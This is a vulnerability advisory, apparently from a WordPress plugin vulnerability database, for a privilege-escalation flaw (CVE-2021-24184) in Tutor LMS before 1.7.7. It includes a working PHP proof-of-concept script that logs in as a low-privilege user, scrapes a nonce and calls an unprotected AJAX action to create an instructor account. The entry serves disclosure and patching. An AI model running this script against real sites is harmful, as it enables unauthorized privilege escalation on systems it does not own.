WordPress Plugin Vulnerabilities

Tutor LMS < 1.7.7 - Unprotected AJAX including Privilege Escalation

Description

Several AJAX endpoints in the plugin were unprotected, allowing students to modify course information and elevate their privileges among many other actions.

Proof of Concept

Only one PoC provided for privilege escalation. 

<?php

// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

// 1) Log in as customer
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/index.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/var\stutor_data\s=\s{"delete_confirm_text"\:"Are you sure\?\sit\scan\snot\sbe\sundone\."\,"nonce_key"\:"_wpnonce","_wpnonce":"([^"]+)"/', $content, $matches);
$nonce = $matches[1];
print_r($nonce);

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'first_name' => 'Instructor',
    'last_name' => 'Instructor',
    'user_login' => 'Instructor',
    'email' => '[email protected]',
    'phone_number' => '1234567890',
    'password' => 'test',
    'password_confirmation' => 'test',
    'tutor_profile_bio' => '',
    'action' => 'tutor_add_instructor',
    '_wpnonce' => $nonce
]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

Affects Plugins

Plugin icon
tutor
Fixed in 1.7.7

References

CVE
CVE-2021-24184
URL
https://www.wordfence.com/blog/2021/03/several-vulnerabilities-patched-in-tutor-lms-plugin/

Classification

Type
PRIVESC
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-269
CVSS
8.1 (high)

Miscellaneous

Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
https://wordfence.com
Submitter twitter
infosecchloe
Verified
Yes
WPVDB ID
5e85917c-7a58-49cb-b8b3-05aa18ffff3e

Timeline

Publicly Published
2021-03-15 (about 2 years ago)
Added
2021-03-15 (about 2 years ago)
Last Updated
2021-03-20 (about 2 years ago)

Other

Published
Title
Published
2022-12-12
Title
iubenda < 3.3.3 - Subscriber+ Privileges Escalation to Admin
Published
2016-04-05
Title
User Role Editor <= 4.24 - Privilege Escalation
Published
2020-03-16
Title
LearnPress < 3.2.6.7 - Privilege Escalation
Published
2017-10-31
Title
Shortcodes Ultimate <= 5.0.0 - Authenticated Contributor Code Execution
Published
2016-07-08
Title
Profile Builder < 2.4.1 - Privilege Escalation